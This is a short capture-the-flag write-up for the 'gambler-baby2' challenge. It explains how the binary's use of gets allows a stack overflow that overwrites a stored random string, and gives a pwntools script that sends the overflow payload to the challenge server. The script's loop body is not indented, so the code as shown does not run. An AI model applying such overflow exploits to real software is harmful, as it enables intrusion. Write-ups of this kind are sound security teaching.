Tags: pwn overflow 

Rating:

The binary uses ```gets```, which we can abuse to overflow the local variable containing the random string.

```
0000158d printf(format: "Guess me a string of length 4 wi…")
0000159e gets(buf: &var_20)
000015b6 printf(format: "Your guess: %s\n", &var_20)
```

```python
from pwn import *

p = process('./gambler-baby2')
p = remote('ctf.b01lers.com', 9203)

while (True):
data = b'A\0'*8+b'A\0'*8
p.sendline(data)
print(p.recvline())

p.interactive()
```

Original writeup (https://github.com/tj-oconnor/ctf-writeups/tree/main/b01lers_ctf/gambler_overflow).